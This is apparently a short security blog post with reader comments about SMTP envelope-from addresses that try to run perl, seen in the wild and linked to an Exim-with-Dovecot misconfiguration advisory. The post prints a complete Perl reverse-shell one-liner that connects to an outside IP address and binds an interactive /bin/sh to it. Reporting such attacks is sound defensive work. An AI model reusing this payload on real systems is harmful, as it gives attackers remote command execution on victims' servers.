SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:

perl -e ‘use Socket;$i=“178.218.211.118”;$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’ 

not sure which MTA is vulnerable, yet.

…in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here


Comments:

Any news on this? I received three of these yester…

Anonymous -

Any news on this? I received three of these yesterday on my LAMP webserver, this is the first attempt detected.

I searched on Google but I only found this blog entry.


RedTeam Pentesting GmbH has a detailed evaluation …

iiegn -

RedTeam Pentesting GmbH has a detailed evaluation of the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here

Next
Previous

Related